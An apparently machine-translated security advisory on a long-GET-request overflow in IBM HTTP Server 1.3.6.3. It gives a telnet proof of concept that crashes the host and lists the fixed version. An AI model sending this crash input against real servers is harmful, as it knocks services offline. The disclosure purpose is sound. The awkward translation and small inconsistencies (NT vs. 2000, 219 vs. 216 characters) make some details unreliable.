Server
Involving procedures:
Get
Describe:
IBM HTTP Server Remote overflow by committing an extra long GET request
With:
IBM's HTTP server is a Web server. A denial of service vulnerability exists in the version used by Windows NT.
Submitting a GET request that is more than 219 characters will cause the server to stop responding with an error. Restarting the application is required to restore the service to work properly. Successful exploitation of this vulnerability could allow an attacker to execute any code on the victim host. (But this has not been fully substantiated.) )
The following code is only used to test and investigate this vulnerability if you use it in an improper way to the consequences at your own risk
$ telnet Target 80
Get/... (216 ".") AAA http/1.0
The system will report the following error message:
STOP:0X0000001E (0x00000005,0x804b3a51,0x00000000,0x00000000) Kmode_excepti
On_not_handled.
Address 804b3a51 base at 80400000,datastamp 384d9b17-ntoskrnl.exe
Note: The target host is running under Windows 2000.
Affected systems
IBM HTTP Server 1.3.6.3
-Turbolinux Turbo Linux 3.0.1
-Sun Solaris 2.6
-S.U.S.E. Linux 6.1
-S.U.S.E. Linux 6.0
-RedHat Linux 6.0 SPARC
-RedHat Linux 5.2 SPARC
-Microsoft Windows NT 4.0
-IBM AIX 4.2.1
-Caldera OpenLinux 2.2
Solution:
IBM has resolved this issue in version 1.3.12, download the address:
Http://www-4.ibm.com/software/webservers/httpservers/download.html